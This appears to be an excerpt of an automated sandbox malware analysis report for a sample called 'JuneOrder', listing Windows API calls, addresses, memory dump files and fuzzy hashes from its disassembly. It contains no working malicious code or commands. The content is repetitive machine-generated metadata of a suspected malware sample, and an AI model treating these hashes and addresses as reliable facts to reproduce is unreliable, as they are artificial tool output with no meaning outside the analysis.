                                        • API String ID: 3293292866-0
                                        • Opcode ID: e1e86a498c82862297bb4ba2eeef0c9791047cff053e7cc11c8159107c07dceb
                                        • Instruction ID: 39e23e6c0b6f630abd0a78494d594864f6bb0b6a3747c7bb50b876903a384421
                                        • Opcode Fuzzy Hash: e1e86a498c82862297bb4ba2eeef0c9791047cff053e7cc11c8159107c07dceb
                                        • Instruction Fuzzy Hash: 94C04C71158304ABCB049BA5FC488D57BBDE74C6153408564F51983661CA36E4408B58
                                        APIs
                                          • Part of subcall function 0040DFC0: TlsGetValue.KERNEL32(0000000D,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,00417070,00000008,0000000C), ref: 0040DFD7
                                          • Part of subcall function 00409BA0: RtlAllocateHeap.NTDLL(00000008,00000000,00402F00,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000,00000000,00000000), ref: 00409BB1
                                        • GetShortPathNameW.KERNEL32(02259F70,02259F70,00002710), ref: 00402C34
                                          • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                                          • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                                          • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                                          • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                          • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02250000,00000000,?), ref: 0040DEF9
                                          • Part of subcall function 00409B80: HeapFree.KERNEL32(00000000,00000000,00401B6B,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,?,00000000,?,00000000,00000000), ref: 00409B8C
                                          • Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037
                                          • Part of subcall function 00405170: TlsGetValue.KERNEL32(?,?,00402FED,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000), ref: 00405178
                                          • Part of subcall function 0040DF50: HeapFree.KERNEL32(02250000,00000000,00000000,?,00000000,?,00411DE4,00000000,00000000,-00000008), ref: 0040DF68
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: HeapValue$AllocateErrorFreeLast$NamePathShortwcslen
                                        • String ID:
                                        • API String ID: 192546213-0
                                        • Opcode ID: 1f36478916e75dc19802576b6717a84d5ffab4db83f33051ef68578c82d7535e
                                        • Instruction ID: 7a2999830b1481a9d7ef80217fec4737815e267699ad494388d5f61b71452053
                                        • Opcode Fuzzy Hash: 1f36478916e75dc19802576b6717a84d5ffab4db83f33051ef68578c82d7535e
                                        • Instruction Fuzzy Hash: F6012D75508201BAE5007BA1DD06D3F76A9EFD0718F10CD3EB944B50E2CA3D9C599A5E
                                        APIs
                                        • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,?,0040AA08,00000000,00000000,?,?,004033E8,00000000,00000000,00000800), ref: 0040AA67
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: FileWrite
                                        • String ID:
                                        • API String ID: 3934441357-0
                                        • Opcode ID: da5ca93210413f8561433c219da2a3ea233fc89f057aa1d005b42788aa018882
                                        • Instruction ID: b59f1f917ceac4f5cea587e7357412edb8aff685aadda2d04846933fd6210d73
                                        • Opcode Fuzzy Hash: da5ca93210413f8561433c219da2a3ea233fc89f057aa1d005b42788aa018882
                                        • Instruction Fuzzy Hash: 0AF09276105700AFD720DF58D948F97BBE8EB58721F10C82EE69AD3690C770E850DB61
                                        APIs
                                        • GetNativeSystemInfo.KERNEL32(00000000,?,00000000,00000000), ref: 00402BDD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: InfoNativeSystem
                                        • String ID:
                                        • API String ID: 1721193555-0
                                        • Opcode ID: f8bc963d6c34cd4fcee6a9003d89fae8e3dd4710dd3c612eeb78866044324f60
                                        • Instruction ID: e96e1892c4c724b03879bd5233d00e0abab71770c233aa8573b83279bd435b66
                                        • Opcode Fuzzy Hash: f8bc963d6c34cd4fcee6a9003d89fae8e3dd4710dd3c612eeb78866044324f60
                                        • Instruction Fuzzy Hash: E6D0126081824986D750BE65850979BB3ECE700304F60883AD085561C1F7BCE9D99657
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000008,00000000,00402F00,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000,00000000,00000000), ref: 00409BB1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: a9125dc5e6675f3a5c8ff565d637a643d225863b8cf5efdab1d921be1d17f71e
                                        • Instruction ID: 6d87291edcf2eeb8e990bf82b01346f6326b2aefffcea0088477b931f0527044
                                        • Opcode Fuzzy Hash: a9125dc5e6675f3a5c8ff565d637a643d225863b8cf5efdab1d921be1d17f71e
                                        • Instruction Fuzzy Hash: 6EC04C717441007AD6509B24AE49F5776E9BB70702F00C4357545D15F5DB70EC50D768
                                        APIs
                                        • TlsFree.KERNELBASE(004011D8,004011AA,00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098,00000004), ref: 0040D2E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: Free
                                        • String ID:
                                        • API String ID: 3978063606-0
                                        • Opcode ID: afb8170c881060827f7b708402de6715e31012ce767a183e2a7e5af61eff3ca6
                                        • Instruction ID: 02f19102e46f6fc925772832a959dff7ad61b801f58b10c94ac68856fb14f403
                                        • Opcode Fuzzy Hash: afb8170c881060827f7b708402de6715e31012ce767a183e2a7e5af61eff3ca6
                                        • Instruction Fuzzy Hash: 04C04C30405100DBDF268B44ED0C7D53671A784305F4484BD9002112F1CB7C459CDA5C
                                        APIs
                                        • HeapCreate.KERNELBASE(00000000,00001000,00000000,0040106C,00000000,00001000,00000000,00000000), ref: 00409B49
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: CreateHeap
                                        • String ID:
                                        • API String ID: 10892065-0
                                        • Opcode ID: 9eba7de511a5334458af75c1b88753425be16814361ea3c54108f6a3be7bfcb4
                                        • Instruction ID: 1bee1f37f93e9d35684b03c2e4756e6010034fad4ed660fefd81427f3766245b
                                        • Opcode Fuzzy Hash: 9eba7de511a5334458af75c1b88753425be16814361ea3c54108f6a3be7bfcb4
                                        • Instruction Fuzzy Hash: 2AB012702C43005AF2500B105C46B8039609304B43F304024B2015A1D4CBF0108045AC
                                        APIs
                                        • HeapDestroy.KERNELBASE(004011DD,004011AA,00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098,00000004), ref: 00409B36
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: DestroyHeap
                                        • String ID:
                                        • API String ID: 2435110975-0
                                        • Opcode ID: 9f5e47457f218c908017f92e5e7370515ba6a022eaaca9f0545f96318fbd8d58
                                        • Instruction ID: ab699811fd0d87702ef007ec9d9e0afa2980276031b74f33cf565c9ea9518c6e
                                        • Opcode Fuzzy Hash: 9f5e47457f218c908017f92e5e7370515ba6a022eaaca9f0545f96318fbd8d58
                                        • Instruction Fuzzy Hash: 98900230404000CBCF015B10ED484843E71F74130532091749015414B0CB314451DA48
                                        APIs
                                          • Part of subcall function 0040DFC0: TlsGetValue.KERNEL32(0000000D,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,00417070,00000008,0000000C), ref: 0040DFD7
                                        • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,00402EE4,00000000,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000), ref: 004026C9
                                        • SizeofResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00402EE4,00000000,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004026D9
                                          • Part of subcall function 00409BA0: RtlAllocateHeap.NTDLL(00000008,00000000,00402F00,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000,00000000,00000000), ref: 00409BB1
                                          • Part of subcall function 00409C80: memcpy.MSVCRT ref: 00409C90
                                        • FreeResource.KERNEL32(?,02259F70,02259F70,00000000,00000000,00000000,00000000,00000000,00000000,00402EE4,00000000,00000000,0000000A,00000000,00000000,00000000), ref: 00402708
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: Resource$AllocateFreeHeapLoadSizeofValuememcpy
                                        • String ID:
                                        • API String ID: 4216414443-0
                                        • Opcode ID: fe55d16754670a1ac2242d55fbe1307306c78159f7c22dacc8df33dc46889b7d
                                        • Instruction ID: a74944ffd3112f9905740440eb7f37d3abcacb2d1106573319e1e0e6d7d597bb
                                        • Opcode Fuzzy Hash: fe55d16754670a1ac2242d55fbe1307306c78159f7c22dacc8df33dc46889b7d
                                        • Instruction Fuzzy Hash: 13F07471818305AFDB01AF61DD0196EBEA2FB98304F01883EF484611B1DB769828AB5A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: D@A
                                        • API String ID: 0-2037432845
                                        • Opcode ID: 82bbbdca95c55e60409104e81861719bc6b7877ec7bc15acddf14cefadc8757b
                                        • Instruction ID: 1e0778d192f5f23141dad884ed32409d8a0e2e34130d822a75cbeb00c40a84ce
                                        • Opcode Fuzzy Hash: 82bbbdca95c55e60409104e81861719bc6b7877ec7bc15acddf14cefadc8757b
                                        • Instruction Fuzzy Hash: BC428FB06047429FD714CF1AC58472ABBE1FF84304F148A3EE8589BB81D379E966CB95
                                        APIs
                                        • GetVersionExW.KERNEL32(?), ref: 004055BA
                                          • Part of subcall function 00405553: memset.MSVCRT ref: 00405562
                                          • Part of subcall function 00405553: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,00000000), ref: 00405571
                                          • Part of subcall function 00405553: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00405581
                                        • GetVersionExW.KERNEL32(?), ref: 00405619
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: Version$AddressHandleModuleProcmemset
                                        • String ID:
                                        • API String ID: 3445250173-0
                                        • Opcode ID: f495203579311227c63983e5ddd909674dbe6439cabb42788c76bcb90ee03a16
                                        • Instruction ID: 9deb98d9ce9b1960b4761c85c685c0f6434d6ff4303ea967f2226934144b7de4
                                        • Opcode Fuzzy Hash: f495203579311227c63983e5ddd909674dbe6439cabb42788c76bcb90ee03a16
                                        • Instruction Fuzzy Hash: 72311F36E04E6583D6308A188C507A32294E7417A0FDA0F37EDDDB72D0D67F8D45AE8A
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(004098F0,0040116F,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098,00000004,00000000,00417070,00000008), ref: 00409A6C
                                        • SetUnhandledExceptionFilter.KERNEL32(0040116F,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098,00000004,00000000,00417070,00000008,00000008), ref: 00409A80
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: be8703ea72731a37991eabb093e21ce865d6a3a52a87f86e162e98d40940aa29
                                        • Instruction ID: 9241775fbeca2ef236d22ba042fa6dd18ecd55e37cf60d082ab63f5987e9b773
                                        • Opcode Fuzzy Hash: be8703ea72731a37991eabb093e21ce865d6a3a52a87f86e162e98d40940aa29
                                        • Instruction Fuzzy Hash: CFE0A571208315EFC310CF10D888A867AB4B748741F02C43EA02992262EB348949DF1D
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: memcpy
                                        • String ID:
                                        • API String ID: 3510742995-0
                                        • Opcode ID: e576844eda630fb24a4900eabb5141639e96436ababb831f4c7fee8327540495
                                        • Instruction ID: d2e712a387542d9911dc411e7765b1f2c08275ba07bac0dbf1d1b28710e8a60d
                                        • Opcode Fuzzy Hash: e576844eda630fb24a4900eabb5141639e96436ababb831f4c7fee8327540495
                                        • Instruction Fuzzy Hash: 13D23BB2B183008FC748CF29C89165AF7E2BFD8214F4A896DE545DB351DB35E846CB86
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: xAA
                                        • API String ID: 0-1293610936
                                        • Opcode ID: 591c47f0151abaa23838d51f7b8325d4d390fbcd3a8530dac875949f81110dcc
                                        • Instruction ID: 3e0955324bacc98d649988aae549d3f33f39a3fcf449ebb2edb4fadec9577cf0
                                        • Opcode Fuzzy Hash: 591c47f0151abaa23838d51f7b8325d4d390fbcd3a8530dac875949f81110dcc
                                        • Instruction Fuzzy Hash: EF62AF71604B129FC718CF29C59066AB7E1FFC8304F144A3EE89597B80D778E919CB95
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: xAA
                                        • API String ID: 0-1293610936
                                        • Opcode ID: 44050466ff59d092c84ade225eb2428a111c67205446c9fc6f6a12c7b28f2e65
                                        • Instruction ID: 97b3e1327a1e87a4b46b26d767485ea51a150d14d874054969dc66b926ead844
                                        • Opcode Fuzzy Hash: 44050466ff59d092c84ade225eb2428a111c67205446c9fc6f6a12c7b28f2e65
                                        • Instruction Fuzzy Hash: 5FD1E6716083818FC704DF28C49026ABBE2EFD9304F188A6EE9D587752D379D94ACB55
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(004011C9,004011AA,00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098,00000004), ref: 00409956
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: cf9cd527b89156cf826f8aca8c9aac0ae0f1dbb698b08308560a1dccda5bc85b
                                        • Instruction ID: bc48fdad81fd92ebd0be0b19d5c8e3ba934b166e7abd4bc921d629b17d7e6aca
                                        • Opcode Fuzzy Hash: cf9cd527b89156cf826f8aca8c9aac0ae0f1dbb698b08308560a1dccda5bc85b
                                        • Instruction Fuzzy Hash: 02B0017800422ADBDB019F10EC88BC83E72B749745F93C078E42981672EB79069EDA0C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7a400b198c8088953b694fc09eb18952a69227507a418fb01e42f7223b2c6d58
                                        • Instruction ID: f4dcce38d5e2b5fea8365ab6f66f10a9b642d7e6e28dacc25e9c3ad87e991d79
                                        • Opcode Fuzzy Hash: 7a400b198c8088953b694fc09eb18952a69227507a418fb01e42f7223b2c6d58
                                        • Instruction Fuzzy Hash: 3512C5B3B546144BD70CCE1DCCA23A9B2D3AFD4218B0E853DB48AD3341FA7DD9198685
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7c460358eba1917bb56d4065ee02bd871fc6c6cc725e64d99fb649ce963d7fe5
                                        • Instruction ID: fcc74630d9e7e7a990481c7c1f867b264d0775cdb04650b32c3420698d071277
                                        • Opcode Fuzzy Hash: 7c460358eba1917bb56d4065ee02bd871fc6c6cc725e64d99fb649ce963d7fe5
                                        • Instruction Fuzzy Hash: DE81E571620E52CBE718CF1DECD06B633A3E7C9320B49C638DA418779AC539E562D794
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1632331993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1632311211.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632360558.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632382861.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1632401391.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_JuneOrder.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 513e02c80492a0d3023dc35d6953037e38dfbd2ea3f16a7153b47b8225a4960d
                                        • Instruction ID: 9051c99f30e4fd58257ce4a82e5c6de57c2f1ea08b849514de36b4a9f860707a
                                        • Opcode Fuzzy Hash: 513e02c80492a0d3023dc35d6953037e38dfbd2ea3f16a7153b47b8225a4960d
